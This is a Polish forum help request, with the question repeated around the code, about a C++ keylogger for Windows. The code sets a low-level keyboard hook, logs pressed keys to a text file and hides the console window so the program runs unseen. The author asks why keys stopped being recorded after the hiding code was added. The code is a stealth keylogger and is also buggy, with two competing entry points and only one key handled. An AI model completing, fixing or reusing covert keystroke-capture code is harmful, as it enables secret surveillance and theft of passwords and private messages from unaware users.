Witam
Do kodu keylogera dodałem taki kod:
CAŁY KOD:
i zgodnie z tym konsoli nie widać widać ją tylko w procesach ale już nie zapisuje klawiszy czy ktoś coś wie co może być nie tak. Programuje w Code Blocks.
Do kodu keylogera dodałem taki kod:
CAŁY KOD:
Kod:
#include <iostream>
#include <fstream>
#include <windows.h>
#include <cstdlib>
#define VK_A 65
using namespace std;
fstream out("plik.txt", ios::out);
const char g_szClassName[] = "klasa";
int main()
{
HWND noWindow;
AllocConsole();
noWindow=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(noWindow,0);
system("pause");
return 0;
}
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
PKBDLLHOOKSTRUCT p= (PKBDLLHOOKSTRUCT) (lParam);
if(wParam==WM_KEYDOWN)
{
switch(p->vkCode)
{
case VK_A:
if(GetAsyncKeyState(VK_LSHIFT) | (GetAsyncKeyState(VK_RSHIFT))
) out << "A";
else
out << "a";
break;
}
}
return CallNextHookEx(NULL, nCode, wParam, lParam);
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
HWND hwnd;
MSG Msg;
hwnd = CreateWindowEx(
WS_EX_CLIENTEDGE,
g_szClassName,
"klasa",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 240, 120,
NULL, NULL, hInstance, NULL);
HHOOK keyboardHook = SetWindowsHookEx(
WH_KEYBOARD_LL,
LowLevelKeyboardProc,
GetModuleHandle(0), 0);
while(GetMessage(&Msg, NULL, 0, 0))
{
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
return Msg.wParam;
return 0;
}
i zgodnie z tym konsoli nie widać widać ją tylko w procesach ale już nie zapisuje klawiszy czy ktoś coś wie co może być nie tak. Programuje w Code Blocks.